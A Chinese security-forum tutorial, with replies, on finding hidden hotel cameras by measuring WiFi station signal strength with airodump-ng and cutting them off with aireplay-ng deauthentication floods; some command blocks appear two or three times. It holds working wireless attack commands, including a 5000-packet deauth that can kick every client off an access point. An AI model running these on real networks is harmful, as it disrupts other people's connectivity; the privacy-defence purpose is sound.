首页
社区
课程
招聘
[原创]使用无线信号特性,查找和终结快捷宾馆中摄像头的一种方法
发表于: 2019-12-14 20:44 12261

[原创]使用无线信号特性,查找和终结快捷宾馆中摄像头的一种方法

2019-12-14 20:44
12261

    各位在快捷宾馆住宿时有没有遇到或者担心遇到什么糟心事?被针孔摄像头偷拍算不算一件很糟心的事?本文提出一种方法来应对这种情况。    针孔摄像头拍摄后势必会通过网络将视屏传送给安装者。由于针孔摄像头的隐蔽性,摄像头不会使用有线网络,剩下的选项就是无线网络了。无线网络有2种选项:a.插入SIM卡,通过4G网络传输;b.使用快捷酒店会提供的WIFI。选项b的投入比选项a小,而且便于集成,另外SIM卡可能是实名制的会被追查,所以针孔摄像头多使用选项b。所以这次将讨论在2.4G WIFI环境中查找摄像头的方法,以及相应的处理方法。为了实现上述目的,需要用到Kali Linux的Aircrack-NG套件,另外还需要可以切换到Monitor模式的无线网卡。在开始之前,先说明几个会用到的术语:AP—指提供热点的设备,通常是无线路由器;Station—指连接到AP的设备,如笔电,手机等,essid—指AP提供的接入点名字,点击windows网络连接时,列表中的接入点名字就是essid。Topic 1: 查找房间里摄像头Introduction 1:Windows网络连接列表里这么多essid是从哪来的?AP会周期性发送Beacon包,包中带有essid以及通信信道,告诉周围Station在它可探测范围内存在的AP,可以来蹭网。可以在网络连接列表中选择一个essid,点击属性,里面列出了每个essid的属性:如bssid,信道等。另外介绍2个搜索AP的工具1).Windows 下InSsider----Mega Geeker的产品;2).Linux下 LinSsider,开源项目,它们都提供了更友好的图形界面。用这些工具收集附近的AP的信息,重点记录下自己正连接的bssid和essid。

Text1:查找房间里摄像头,其实是评估房间里无线设备的数量。Aircrack-ng套件中的airodump-ng工具可以扫描并列出特定essid下连接着的Station,同时给出这些Station到你手上的无线网卡的信号衰减程度,一般而言距离越远,衰减越多。根据802.11给出的参考值以及我自己的测试发现:两个设备挨在一起时信号衰减是-10mdb,普通室内信号的衰减在-30mdb—60mdb之间,设备之间隔一堵墙衰减达到-70—80mdb。而这些信号衰减程度有助于我们查找室内无线设备的数量。设想,当走进陌生的房间,可见的无线设备无非是房间网络电视机1台,如果列表中给出的Station数量多的有点惊人,而且这些Station的信号衰减程度在-70mdb以内可以断定房间里杀气腾腾。通过在房间里走动,观察信号衰减程度的变化,可以接近和定位其中一个针孔摄像头。
>airodump-ng --bssid 50:fa:84:16:46:ea --essid WirelessLab –c 1 –a
#-c是指AP使用的信道从前面LinSsid获得
#--bssid,--essid的参数 50:fa:84:16:46:ea和WirelessLab从前面LinSsid获得
图中airodump-ng的输出中 PWR那一列是运行airodump-ng的机器到房间内其他Station的信号衰减程度Topic 2: 断开摄像头的链接Introduction 2:TCP(是怎样建立连接的?)通过3次握手建立连接。Station与AP建立WIFI连接有类似的过程:扫描-认证-关联-连接4个阶段。Station和AP建立连接后,可以发送Deauthentication包让Station解除认证。Deauthentication是IEEE 802.11 协议所规定的,用来解除认证的帧。具有如下特点:1).没有加密 任何人都可以发送;2).容易伪造来源MAC地址3).强制客户端掉线Tex2:前面的步骤即使我们找到了所有的摄像头,也不代表我们可以把这些摄像头全部取下来并关闭。比如,有些摄像头藏在墙上插座后面,我总不至于出差在外还带着螺丝刀把面板卸下来。万一触电怎么办?就算没触电,破坏酒店设置又怎么办?面对这些摄像头,我们就真的无计可施了?倒也不是,可以让摄像头断网,那视频就无法上传了。这就用到aircrack-ng套件中的另一个工具aireply-ng,它可以向AP/Station发送包含特定数据的包,比如Deauthentication包,让特定的station下线.实施前首先要测试AP是否可以注入
root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea  wlan1mon
02:30:50  Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50  Trying broadcast probe requests...
02:30:50  Injection is working! #有这段话,可以认为可以实施注入
02:30:52  Found 1 AP 
02:30:52  Trying directed probe requests...
02:30:52  50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52  Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52  30/30: 100% #
确定AP可以注入后,即可实施断网
    root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
    -c指定一个Station,不加 -c选项则将AP下所有的Station全踢下线
Summary:我们的网卡一般工作在Managed模式下,只能接受发送AP发送给它的帧。Station收到这些帧后,会把802.11头部剥去,替换为Ethnet头部然后发送给网络协议栈。这样做的好处是对上层应用屏蔽其底层传输介质,坏处就是无法分析802.11协议头部。如果想接受到周围的所有数据帧,以及完成上述实验,需要将网卡切换到Monitor模式。当然不是所有的网卡支持Monitor模式。Windows下只能选Mega Geek的Airpcap网卡,就是贵了点:支持802.11 b/g/n协议的大概要2K左右;支持a/b/g/n协议的在5K左右。所以一般会在Linux下完成上述任务。另外,如果网卡只支持802.11 b/g/n协议,那么它将接受不到5GHz的AP信号。当然了现在很多无线设备和无线路由只支持b/g/n协议。查看网卡支持的工作模式以及支持的802.11协议:
# iw list
Supported interface modes:
#支持的工作模式
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
…
Frequencies:
#支持的频段
			* 2412 MHz [1] (20.0 dBm)
			* 2417 MHz [2] (20.0 dBm)

>airodump-ng --bssid 50:fa:84:16:46:ea --essid WirelessLab –c 1 –a
#-c是指AP使用的信道从前面LinSsid获得
#--bssid,--essid的参数 50:fa:84:16:46:ea和WirelessLab从前面LinSsid获得
图中airodump-ng的输出中 PWR那一列是运行airodump-ng的机器到房间内其他Station的信号衰减程度Topic 2: 断开摄像头的链接Introduction 2:TCP(是怎样建立连接的?)通过3次握手建立连接。Station与AP建立WIFI连接有类似的过程:扫描-认证-关联-连接4个阶段。Station和AP建立连接后,可以发送Deauthentication包让Station解除认证。Deauthentication是IEEE 802.11 协议所规定的,用来解除认证的帧。具有如下特点:1).没有加密 任何人都可以发送;2).容易伪造来源MAC地址3).强制客户端掉线Tex2:前面的步骤即使我们找到了所有的摄像头,也不代表我们可以把这些摄像头全部取下来并关闭。比如,有些摄像头藏在墙上插座后面,我总不至于出差在外还带着螺丝刀把面板卸下来。万一触电怎么办?就算没触电,破坏酒店设置又怎么办?面对这些摄像头,我们就真的无计可施了?倒也不是,可以让摄像头断网,那视频就无法上传了。这就用到aircrack-ng套件中的另一个工具aireply-ng,它可以向AP/Station发送包含特定数据的包,比如Deauthentication包,让特定的station下线.实施前首先要测试AP是否可以注入
root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea  wlan1mon
02:30:50  Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50  Trying broadcast probe requests...
02:30:50  Injection is working! #有这段话,可以认为可以实施注入
02:30:52  Found 1 AP 
02:30:52  Trying directed probe requests...
02:30:52  50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52  Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52  30/30: 100% #
确定AP可以注入后,即可实施断网
    root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
    -c指定一个Station,不加 -c选项则将AP下所有的Station全踢下线
Summary:我们的网卡一般工作在Managed模式下,只能接受发送AP发送给它的帧。Station收到这些帧后,会把802.11头部剥去,替换为Ethnet头部然后发送给网络协议栈。这样做的好处是对上层应用屏蔽其底层传输介质,坏处就是无法分析802.11协议头部。如果想接受到周围的所有数据帧,以及完成上述实验,需要将网卡切换到Monitor模式。当然不是所有的网卡支持Monitor模式。Windows下只能选Mega Geek的Airpcap网卡,就是贵了点:支持802.11 b/g/n协议的大概要2K左右;支持a/b/g/n协议的在5K左右。所以一般会在Linux下完成上述任务。另外,如果网卡只支持802.11 b/g/n协议,那么它将接受不到5GHz的AP信号。当然了现在很多无线设备和无线路由只支持b/g/n协议。查看网卡支持的工作模式以及支持的802.11协议:
# iw list
Supported interface modes:
#支持的工作模式
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
…
Frequencies:
#支持的频段
			* 2412 MHz [1] (20.0 dBm)
			* 2417 MHz [2] (20.0 dBm)

root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea  wlan1mon
02:30:50  Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50  Trying broadcast probe requests...
02:30:50  Injection is working! #有这段话,可以认为可以实施注入
02:30:52  Found 1 AP 
02:30:52  Trying directed probe requests...
02:30:52  50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52  Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52  30/30: 100% #
确定AP可以注入后,即可实施断网

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 1
支持
分享
最新回复 (4)
雪    币: 11160
活跃值: (3115)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
沙发 支持!!
2019-12-15 13:23
0
雪    币: 6303
活跃值: (2051)
能力值: ( LV7,RANK:150 )
在线值:
发帖
回帖
粉丝
3
Mobisys 18有一篇论文,介绍了如何检测隐藏摄像头。
https://www.researchgate.net/publication/326240080_Detecting_Wireless_Spy_Cameras_Via_Stimulating_and_Probing
2019-12-15 22:16
0
雪    币: 802
活跃值: (4433)
能力值: ( LV12,RANK:260 )
在线值:
发帖
回帖
粉丝
4
二当家a Mobisys 18有一篇论文,介绍了如何检测隐藏摄像头。 https://www.researchgate.net/publication/326240080_Detecting_Wireless ...
谢谢 我学习一下
2019-12-16 13:13
0
雪    币: 22
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
5
利用station到设备的衰减来判断是否是隐藏摄像头,原理略显粗糙
2019-12-26 16:22
0
游客
登录 | 注册 方可回帖
返回
//